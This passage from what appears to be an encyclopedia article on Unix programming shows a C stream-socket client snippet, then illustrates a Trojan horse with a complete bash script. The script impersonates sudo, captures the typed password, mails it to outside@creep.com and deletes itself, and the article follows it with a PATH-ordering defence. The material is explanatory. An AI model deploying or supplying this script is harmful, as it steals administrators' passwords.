If connect() returns zero, the client can engage in an algorithmic dialog with the server. The client may send stream data via write( client_socket_fd ) and may receive stream data via read( client_socket_fd ).

Snippet to illustrate client I/O on a stream socket:

{

/* Omit construction code */

return_value =

connect(

client_socket_fd,

(struct sockaddr *) &sockaddr_un,

sizeof( struct sockaddr_un ) );

if ( return_value == -1 ) assert( 0 );

if ( return_value == 0 )

{

client_algorithmic_dialog( client_socket_fd );

}

/* close( client_socket_fd ); <-- optional */

/* When the client process terminates, */

/* if the server attempts to read(), */

/* then read_count will be either 0 or -1. */

/* This is a message for the server */

/* to execute close(). */

exit( EXIT_SUCCESS );

}

  1. define BUFFER_SIZE 1024

void client_algorithmic_dialog(

int client_socket_fd )

{

char buffer[ BUFFER_SIZE ];

int read_count;

strcpy( buffer, "hola" );

write( client_socket_fd, buffer, strlen( buffer ) + 1 );

read_count = read( client_socket_fd, buffer, BUFFER_SIZE );

if ( read_count > 0 ) puts( buffer );

}

Linux Trojan horse

A Trojan horse is a program that purports to perform some legitimate function, yet upon execution it compromises the user's security.{{cite book

| last1 = Wood

| first1 = Patrick H.

| last2 = Kochan

| first2 = Stephen G.

| title = UNIX System Security

| publisher = Hayden Books

| year = 1985

| page = 42

| isbn = 0-8104-6267-2

}} A simple example is the following malicious version of the Linux sudo command. An attacker would place this script in a publicly writable directory (e.g., /tmp). If an administrator happens to be in this directory and executes sudo, then the Trojan may execute, compromising the administrator's password.

  1. !/usr/bin/env bash
  1. Turn off the character echo to the screen. sudo does this to prevent the user's password from appearing on screen when they type it in.

stty -echo

  1. Prompt user for password and then read input. To disguise the nature of this malicious version, do this 3 times to imitate the behavior of sudo when a user enters the wrong password.

prompt_count=1

while [ $prompt_count -le 3 ]; do

echo -n "[sudo] password for $(whoami): "

read password_input

echo

sleep 3 # sudo will pause between repeated prompts

prompt_count=$(( prompt_count + 1 ))

done

  1. Turn the character echo back on.

stty echo

echo $password_input | mail -s "$(whoami)'s password" outside@creep.com

  1. Display sudo's actual error message and then delete self.

echo "sudo: 3 incorrect password attempts"

rm $0

exit 1 # sudo returns 1 with a failed password attempt

To prevent a sudo Trojan horse, set the . entry in the PATH environment variable to be located at the tail end.{{cite book

| last1 = Wood

| first1 = Patrick H.

| last2 = Kochan

| first2 = Stephen G.

| title = UNIX System Security

| publisher = Hayden Books

| year = 1985

| page = 43

| isbn = 0-8104-6267-2

| quote = The above Trojan horse works only if a user's PATH is set to search the current directory for commands before searching the system's directories.

}} For example: PATH=/usr/local/bin:/usr/bin:..

See also

  • {{Annotated link|Computer program}}
  • {{Annotated link|Field (computer science)}}

Notes

{{Notelist}}

References

{{reflist}}